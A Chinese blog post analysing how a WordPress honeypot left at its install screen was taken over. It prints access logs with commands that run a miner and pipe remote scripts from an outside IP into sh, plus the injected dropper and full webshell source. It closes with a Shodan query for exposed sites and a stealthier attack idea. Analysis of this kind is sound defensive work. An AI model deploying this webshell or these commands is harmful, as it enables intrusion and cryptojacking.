在年假前,我部屬了幾台 WordPress 的 Honeypot 想撿看看野生的 Payload,我當時把 Docker 給跑起來之後就丟著,沒有特別去管它。
年假結束後,打開我的監控軟體觀察,一看下了一跳,竟然在奇怪的地方被塞了一個 WebShell !! 是從非預期的方法進來的,太怪了ㄅ QQ
接下來我對這個入侵方式做了一系列的探索,發現了一些有趣的東西。
觀察入侵方式
進入點
暫時來當藍隊觀察一下入侵方式,直接對 access log 透過 grep 觀察 webshell 的檔名
162.55.76.218 - - [29/Jan/2022:20:45:18 +0000] "GET /wp-content/themes/twentytwentyone/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14"
162.55.76.218 - - [29/Jan/2022:20:45:23 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
162.55.76.218 - - [29/Jan/2022:20:45:24 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?wie HTTP/1.1" 200 635 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0a2) Gecko/20110524 Firefox/5.0a2"
162.55.76.218 - - [29/Jan/2022:20:45:25 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 597 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentytwenty/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.04506.648; .NET4.0C; .NET4.0E)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+kill_dangling_irc%3B+bash+kill_dangling_irc+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+xmr64%3B+.%2Fxmr64+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24"
54.36.49.151 - - [04/Feb/2022:02:24:59 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18"
54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 597 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre"
54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+kill_dangling_irc%3B+bash+kill_dangling_irc+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12"
54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+xmr64%3B+.%2Fxmr64+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+pty3%3B+.%2Fpty3+%26 HTTP/1.1" 200 455 "-" "Mozilla/5.0 (X11; CrOS i686 12.433.216) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.105 Safari/534.30"
54.36.49.151 - - [04/Feb/2022:02:25:20 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=wget+-qO+-+http%3A%2F%2F34.66.229.152%2F.b%2F1sh+%7C+sh HTTP/1.1" 200 432 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729; .NET4.0E)"
54.36.49.151 - - [04/Feb/2022:02:25:21 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=curl+http%3A%2F%2F34.66.229.152%2F.b%2F3sh+%7C+sh HTTP/1.1" 200 517 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16"可以確定總共有兩個 IP 使用過這個 WebShell , 分別是 54.36.49.151 跟 162.55.76.218。
接下來可以發現到 , 時間比較早的是 162.55.76.218 有做了一系列的入侵行為,而另外一個 IP 就僅是使用 Webshell 而已,這邊我有一點懶得把他的惡意程式載下來分析,就算了。
合理懷疑這兩台電腦都是 Botnet,探索他們的國家之類沒有太大的意義,除非想要把 Botnet 搶過來。
162.55.76.218 - - [29/Jan/2022:20:45:08 +0000] "POST /wp-admin/install.php?step=2 HTTP/1.1" 200 2053 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
162.55.76.218 - - [29/Jan/2022:20:45:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3740 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
162.55.76.218 - - [29/Jan/2022:20:45:12 +0000] "GET /wp-admin/themes.php HTTP/1.1" 200 13209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24"
162.55.76.218 - - [29/Jan/2022:20:45:14 +0000] "GET /wp-admin/theme-editor.php?file=header.php&theme=twentytwentyone&scrollto=0 HTTP/1.1" 200 14876 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1"
162.55.76.218 - - [29/Jan/2022:20:45:15 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 769 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
162.55.76.218 - - [29/Jan/2022:20:45:17 +0000] "GET /wp-content/themes/twentytwentyone/header.php?t6 HTTP/1.1" 500 282 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/19.0.1047.0 Safari/535.22"
162.55.76.218 - - [29/Jan/2022:20:45:18 +0000] "GET /wp-content/themes/twentytwentyone/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14"
162.55.76.218 - - [29/Jan/2022:20:45:18 +0000] "GET /wp-admin/theme-editor.php?file=header.php&theme=twentynineteen&scrollto=0 HTTP/1.1" 200 14014 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; YComp 5.0.0.0)"
162.55.76.218 - - [29/Jan/2022:20:45:21 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 575 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1"
162.55.76.218 - - [29/Jan/2022:20:45:22 +0000] "GET /wp-content/themes/twentynineteen/header.php?t6 HTTP/1.1" 500 64348 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24"
162.55.76.218 - - [29/Jan/2022:20:45:23 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
162.55.76.218 - - [29/Jan/2022:20:45:24 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?wie HTTP/1.1" 200 635 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0a2) Gecko/20110524 Firefox/5.0a2"
162.55.76.218 - - [29/Jan/2022:20:45:25 +0000] "GET /wp-admin/theme-editor.php?file=header.php&theme=twentytwenty&scrollto=0 HTTP/1.1" 503 2916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10"
162.55.76.218 - - [29/Jan/2022:20:45:25 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6"
162.55.76.218 - - [29/Jan/2022:20:45:25 +0000] "GET /wp-content/themes/twentytwenty/header.php?t6 HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 597 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentytwenty/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.04506.648; .NET4.0C; .NET4.0E)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+kill_dangling_irc%3B+bash+kill_dangling_irc+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+xmr64%3B+.%2Fxmr64+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24"發現他第一次的進入點竟然是 /wp-admin/install.php ?!
ㄛ乾 … QQ,所以是我當初把 Docker 給 up 上去之後,忘記安裝 WordPress 了,因此 WordPress 就停留在安裝畫面,接下來這個駭客就很好心的幫我把 WordPress 給安裝好,並且在裡面埋了 Webshell。
埋 Webshell
接下來駭客透過 POST /wp-admin/admin-ajax.php 的方法在我的 theme 的 header.php 裡面埋了一些東西,但因為他沒有做好毀屍滅跡,我們可以繼續追晉去觀察。
發現在 header.php 裡面多了這一坨東西
<?php if (isset($_GET['t6'])) { $data = "<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP6cVfkPgy862xKQhOOAWOK0SBsKKgJRTyuVO0yOvY5d/NbdNYHe8d87u3gntoHr6Yo/EGl05tl0c2lz51RTGAvTxHPcodwwVNB2E1dGd0aSpZSHydLom6NBu9PuOjkP7MxuDCzQDvcHh/2jo8Fe3+/vHWv9vf7gUH//8PDgwNnzPeeDJpA6ej9CXI74kNEw4XTpMlkMEz5q2i3iBil142AwOUI5HKds4o17uNJTG242mQcEKPk7J4wTD66vzmDlMFXQwhcWgMg8CBkwT+8I3R33shpAQHhYx/Mo+jv5KWZcBJ5WI2M4dbvQtXTTq9+nSjf6yXx+dp9czOb6J9gFDS4xDmPUH/dXZgEJ+BWojD9RpLEZJkzO4TPEDlKXh/3RwmRil0dj3mTTKKXDN77vjxYp9QgdDrJ7YHYUbSBq4bFkT++5I8YuVjihzV0/pTHEhAepdHIp41q5b8YfMm+JXK6QASRBrEla5Z5Am4x7laNN5D7k+Pso0hv6YISMEWFn7V+n8xt9FRL9k6ky3GgoxauCf50HUFsFqQbWpEuiuKWlzBYny+0syOxcrAyd6ea2lMu1jSmSNzRZ/LSpbSdIBeGWFnBBw4TYwrWmXlxP3hKakKgppqVrvdfQKMQhO9hfhFwKL0Iu7dPzuT07/WYKlnLBPvwAvhMxAlDgNCd1borKdlaCLUwAxl8MPSGJm23EEPExSHqtgwoEAZ5R9TZkojKswtmum8YehrYmrnQuo3GCaiHhwMJ/iPUO5K2z3vTlN9Hwc7OAUZFa7ol4VUBG3GmR8oRwygVALd9CqF1vidzoLF/EId8kPc+iFAslFKnPSZ5uFryE5UlKUUYSSsYJTIkdtC5dk+6ttY5Cz6azGz3H8vbDCPXQUeoXoI/qJ0HviK0OJp4tNI10emyc2cp+GypRatWJSKavhEtmWHLmTSrBsYMIXkxhKrgvKs9l18XGAxy3BPaTg3GfGv4C2iYujTo1tsq0zaaz2enF+VrsvTeeem3mJ9gQVFgSdPzB2LR/E758KWLBOpNPINL49i0GQiLX97FAKgj1wHwbJ1hJlWtJno9L9YUR9/ax8L0oCB5leaHXyWJWuldgB+I8YDy8HfeUYLxD7a3r5tQWGRaPnCGivSTcxlqKLUMKDEwnpkNet9yyzPbKMjuSH6JBrgXWEPLQswq0+AEXEnJmmMjfsqqyfEFy3FusiX7T2fJhDOWlqTSzJkf1mRYV23av+8xXtBkk5DYquZvjPuOU4hNwCLV60HttPa2F3pZHjFUi9VkM/aCmJj5Xa0ETaN6uQBp65EIz3bCo6mH+rUjWWJQ/fnw1zgj1baTVj6pemXW99q54orY0Y3HOLFqbfP0a/JzGsSPGK5Xy6gigZGWP75kcADQ39rS6Zyab+02uYzS4ZqJcrmJEX80I+qjOFN84BRHnEQ8zHC6l3o7nY6dxXrojvPkPF8quiVpGukS8RQ1igtDzVUWwSA9G3SHRtgtk2cW14swjhfZIFudxJa2HQyVEwRfRR9aD98U5xROngRtu57O4RjNDJAuZtuDr2CqHeOGtj1uqvRYpqQ8HxXlDdcTe/50NXhoNNpe8JZhuxfA0zzJ5kegWrgwxI13MtqG/De9ZRkFW+h+n57oaFU3fUlTHdEJ/bkepEPpB8IjBQeS8iI8+/ws=')))); ?>"; file_put_contents("C9698F925C1D8B544C62895AABF85155.php", $data); } ?>以 Webshell 來說,這種寫法其實滿老梗的,如果有設定 t6 這個參數的話,就把後面那一坨寫入 C9698F925C1D8B544C62895AABF85155.php 檔案
所以上面那一坨我們先直接把他的 eval 替換成 echo 就能看到原始碼了
有 Bug 的 Webshell 笑死
@session_start();
error_reporting(0);
$auth_pass = "7417088120f026d02019047766a2fda9";
function printLogin() {
echo "<h1>Not Found</h1>";
echo "<p>The requested URL was not found on this server.</p>";
echo "<hr>";
echo "<address>Apache Server at ". $_SERVER['HTTP_HOST'] . " Port 80</address>";
echo "<style>";
echo "input { margin:0;background-color:#fff;border:1px solid #fff; }";
echo "</style>";
echo "<center>";
echo "<form method=post>";
echo "<input type=password name=pass>";
echo "</form></center>";
exit;
}
if (isset($_GET['wie'])) {
$arr = array("who" => array(
"os_name" => php_uname('s'),
"uname_version_info" => php_uname('v'),
"machine_type" => php_uname('m'),
"kernel" => php_uname('r'),
"php_uname" => php_uname(),
"is64bit" => PHP_INT_SIZE === 4 ? false : true
));
print(json_encode($arr));
exit;
} elseif (isset($_GET['knal'])) {
$comd = $_GET['knal'];
echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
exit;
} elseif (isset($_POST['submit'])) {
$uploaddir = pwd();
if (!$name = $_POST['newname']) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
echo "Upload Failed";
} else {
echo "Upload Success to " . $uploaddir . $name . " :D ";
}
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
echo "<title>UnKnown - muhstik</title><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
function pwd()
{
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
}
;
} elseif ($u = strrpos($cwd, '\\')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '\\';
} else {
return $cwd;
}
;
}
;
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if (isset($_POST['command'])) {
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
} else {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<pre><font size=3 color=#000000>" . shell_exec('dir') . "</font></pre>";
} else {
echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
}
}可以發現第 3 行的地方有一個 $auth_pass = "7417088120f026d02019047766a2fda9"; 在 cmd5 上面可以解出來是 777shell777
但,事實上,不使用這個密碼依然可以使用這個 Shell ㄟ,在第 34 行的地方有寫到的這些東西
elseif (isset($_GET['knal'])) {
$comd = $_GET['knal'];
echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
exit;
} elseif (isset($_POST['submit'])) {
$uploaddir = pwd();
if (!$name = $_POST['newname']) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
echo "Upload Failed";
} else {
echo "Upload Success to " . $uploaddir . $name . " :D ";
}
exit;
}而他的密碼驗證邏輯寫在 52 行
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
太好笑了ㄅ,駭客是不是都不太會寫程式 XDDD,如果他把這幾行寫去最上面,才能正確的使用到密碼的功能。
在程式碼的第 60 行可以看到 echo "<title>UnKnown - muhstik</title><br>";
透過 muhstik 這個關鍵字可以查到一些資訊,包含了他是勒索軟體,以及瞄準了 NAS 進行攻擊
這駭客好弱ㄛ,好好笑
其他 Webshell
因為可以觀察到,這個 webshell 如果不給任何參數時,他會噴
function printLogin() {
echo "<h1>Not Found</h1>";
echo "<p>The requested URL was not found on this server.</p>";
echo "<hr>";
echo "<address>Apache Server at ". $_SERVER['HTTP_HOST'] . " Port 80</address>";
echo "<style>";
echo "input { margin:0;background-color:#fff;border:1px solid #fff; }";
echo "</style>";
echo "<center>";
echo "<form method=post>";
echo "<input type=password name=pass>";
echo "</form></center>";
exit;
}雖然這看起來很像是一個 Apache 的 404 頁面,不過他其實有一個隱藏的表單;另外還有一個有趣的地方是,透過這種方式回應的 HTTP Status Code 會是 200 OK 才對。
我們可以試著在 Shodan 上面掃看看這個特徵
http.status:200 http.html:"input { margin:0;background-color:#fff;border:1px solid #fff; }"發現有好多被埋這個 Shell 的電腦哦,好好笑
不過我使用上面的參數跟密碼都進不去就是了 QQ,看樣子他們的參數是會動態變更的。
我有辦法當駭客做一樣的事ㄇ?
到此,我們得知了駭客的進入點是停留在安裝介面的 WordPress,透過好心的幫忘記安裝 WordPress 的人安裝,再埋 Webshell。
那目前這個世界上,有多少人跟我一樣蠢, WordPress 安裝到一半就忘記了,丟在上面呢?
摁……好多ㄛ,理論上上面的電腦,大多數都可以直接撿 Shell 變成肉雞,但我覺得如果要幹黑產的話,他這種方法不夠高明,因為 WordPress 安裝好後就會變成安裝好的畫面,哪一天使用者想起來後就會發現問題。
比較好的攻擊方法應該是要安裝完,埋好 Shell 後再把頁面變回安裝畫面,這樣的話可以大大的降低使用者發現的機會。